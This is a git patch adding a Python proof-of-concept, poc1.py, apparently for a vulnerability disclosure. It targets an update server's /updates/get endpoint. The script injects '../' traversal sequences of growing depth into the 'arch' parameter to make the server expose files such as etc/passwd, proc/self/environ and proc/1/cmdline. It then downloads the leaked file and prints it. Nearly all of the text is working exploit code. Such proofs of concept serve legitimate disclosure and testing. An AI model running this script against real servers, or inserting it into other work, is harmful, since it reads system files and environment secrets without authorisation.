From f26d905664003a94a4f80fbd6111d2124b8bd91e Mon Sep 17 00:00:00 2001 From: hugy Date: Fri, 29 May 2026 07:09:29 +0000 Subject: [PATCH] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20rosetta-sdu-2026-0000/poc1.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rosetta-sdu-2026-0000/poc1.py | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 rosetta-sdu-2026-0000/poc1.py diff --git a/rosetta-sdu-2026-0000/poc1.py b/rosetta-sdu-2026-0000/poc1.py new file mode 100644 index 0000000..076f3f4 --- /dev/null +++ b/rosetta-sdu-2026-0000/poc1.py @@ -0,0 +1,42 @@ +import sys +import json +from urllib.request import urlopen +from urllib.error import URLError + +url = sys.argv[1] if len(sys.argv) > 1 else "http://UPDSRV:8080" +url = url.rstrip("/") + +targets = [ + "etc/hostname", + "etc/passwd", + "proc/1/cmdline", + "proc/self/environ", + "proc/cpuinfo", +] + +for depth in range(1, 11): + up = "/".join([".."] * depth) + for target in targets: + arch = f"{up}/{target}" + params = f"platform=android&arch={arch}&app=1.0.0&kernel=0.0.0" + try: + with urlopen(f"{url}/updates/get?{params}", timeout=5) as resp: + data = json.loads(resp.read()) + except (URLError, ValueError): + continue + + update_needed = data.get("kernelUpdateRequired") or data.get("kernel_update_required") + kernel_url = data.get("kernelUrl") or data.get("kernel_url") + + if update_needed and kernel_url and ".." in kernel_url: + print(f"Found: {kernel_url}") + try: + with urlopen(url + kernel_url, timeout=5) as f: + content = f.read().decode("utf-8", errors="replace") + print(content[:1000]) + except URLError: + print("Failed to download file.") + sys.exit(0) + +print("Not vulnerable") +sys.exit(1)